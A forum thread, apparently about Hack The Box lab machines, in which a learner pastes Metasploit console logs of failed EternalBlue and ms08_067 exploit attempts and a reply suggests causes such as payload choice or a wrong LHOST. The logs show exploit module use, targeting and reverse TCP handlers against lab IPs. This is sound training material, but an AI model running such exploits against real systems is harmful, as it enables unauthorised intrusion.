Exploit completed but no sessions created II

Hello.

I’ve attempted to run exploits on 3 machines, Lame, Legacy, and Blue. They all come back with the same message, “Exploit completed but no session created.” I’m thinking it may have something to do with VPN and not metasploit?

I tried to reinstall Metasploit from GitHub - the nightly installer, no dice. I’m using the latest version of Kali on a Virtual box VM.

The first example is Blue.

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

Started reverse TCP handler on 10.0.3.15:4444
10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
10.10.10.40:445 - CORE raw buffer dump (42 bytes)
10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
10.10.10.40:445 - Sending all but last fragment of exploit packet
[-] 10.10.10.40:445 - RubySMB::Error::CommunicationError: An error occured reading from the Socket Connection reset by peer
[*] Exploit completed, but no session was created.

The second example is Legacy.
Here I’ve tried auto targeting and a few other targets. I am unable to get a session.

[] Started reverse TCP handler on 10.0.3.15:4444
[-] 10.10.10.4:445 - Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_PIPE_NOT_AVAILABLE (Command=162 WordCount=0)
[
] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms08_067_netapi) > set target 0
target => 0
msf5 exploit(windows/smb/ms08_067_netapi) > run

[] Started reverse TCP handler on 10.0.3.15:4444
[
] 10.10.10.4:445 - Automatically detecting the target…
[] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 2+ - lang:English
[-] 10.10.10.4:445 - Could not determine the exact service pack
[-] 10.10.10.4:445 - Auto-targeting failed, use ‘show targets’ to manually select one
[
] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms08_067_netapi) > set target 1
target => 1
msf5 exploit(windows/smb/ms08_067_netapi) > run

[] Started reverse TCP handler on 10.0.3.15:4444
[-] 10.10.10.4:445 - Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_PIPE_NOT_AVAILABLE (Command=162 WordCount=0)
[
] Exploit completed, but no session was created.

I am getting the same exact issues for the same 3 boxes. I have used Kali 2020.4, 2019.3 and parrot meterpreter msf5 and 6. I have searched google and youtube with no answers found.
I am following The Cyber Mentor Practical Ethical Hacking Course, and following his steps. So I’m guessing it is the boxes which are faulty…

So, I’d suggest:

  • check the payload you have selected is correct. Running staged vs unstaged is one of the most common reasons for a session to fail
  • something is missing in the configuration
  • you’ve used the wrong IP address for LHOST

Failing that it might well be something on the box is broken.